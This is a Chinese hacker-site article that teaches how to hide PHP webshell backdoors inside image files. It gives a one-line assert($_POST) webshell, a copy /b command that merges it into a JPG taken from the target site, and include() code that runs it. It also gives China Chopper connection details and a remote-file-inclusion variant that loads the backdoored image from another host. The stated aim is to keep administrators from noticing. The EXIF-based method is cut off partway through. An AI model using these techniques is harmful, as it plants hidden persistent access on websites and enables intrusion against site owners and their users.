黑客怎么找,上哪里可以找到黑客高手

黑客怎么找,上哪里可以找到黑客高手

黑客平台hacker2020-10-31 8:00:0046941A+A-

PHP图片后门藏匿攻略

我们平时藏匿图片后门是什么流程呢?我们来看一下

0x01 初级的藏匿方法:

 

1、建立一个eval.php文件,上面加入我们的后门:

1  assert($_POST[feiji]);?>

2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。

3、合并图片和php后门:

1 Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg

4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:

1  include (2.jpg); ?>

5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。

 

访问图片正常:

访问images.php页面出现乱码,但是后门已经正常运行:

但是一句话在菜刀里是可以解析成功的:

 

注:省去第3步也是可以的,只不过直接访问图片会乱码,会让管理员起疑心。

 

0x02 中级藏匿的方法:

 

1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵Apache和修改php.ini文件:

  • 修改ini的配置选项allow_url_fopen和allow_url_include为ON。

2、创建任何一个php文件中,以images.php为例,写入以下的代码:

1  $filename=$_GET['feiji'];include ($filename); ?>

3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上,在菜刀里添加一句话后门:

http://127.0.0.1/images/images.php?feiji=http://www.xxxx.com/images/2.jpg 密码为feiji

 

注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。

 

 

0x03 高级的藏匿方法

背景知识:

EXIF信息: 是可交换图像文件的缩写,是专门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。所有的JPEG文件以字符串“0xFFD8”开头,并以字符串“0xFFD9”结束。文件头中有一系列“0xFF??”格式的字符串,称为“标识”,用来标记JPEG文件的信息段。“0xFFD8”表示图像信息开始,“0xFFD9”表示图像信息结束,这两个标识后面没有信息,而其它标识紧跟一些信息字符。

其实就是这个玩意儿:选定图片右键选择属性,在详细信息里面可以看到(win7)



1、php里面有一个函数exif_read_data(),可以取得图片的EXIF信息头,但是需要开启php_exif模块

2、我们是可以随意修改EXIF信息的,例如:


(责任编辑:网络)

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理